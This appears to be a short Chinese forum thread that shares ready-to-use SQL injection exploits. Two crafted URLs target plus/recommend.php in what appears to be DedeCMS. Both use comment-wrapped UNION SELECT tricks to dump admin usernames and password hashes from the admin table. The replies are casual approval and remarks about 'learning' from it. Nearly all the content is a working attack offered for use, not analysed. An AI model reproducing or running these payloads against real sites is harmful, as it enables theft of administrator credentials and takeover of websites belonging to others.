Exp:
plus/recommend.php?action=&aid=1&_FILES=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES=1.jpg&_FILES =application/octet-stream&_FILES=111
另外一枚/plus/recommend.php?aid=1&_FILES&_FILES&_FILES&_FILES=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat(userid,0x23,pwd),5,6,7,8,9 from `%23@__admin`%23
看看学习一下
瞅瞅和v8.0的区别
{:2_27:}{:2_27:}{:2_27:}
这个好啊 哈哈哈哈
:):):):)学习xxLZ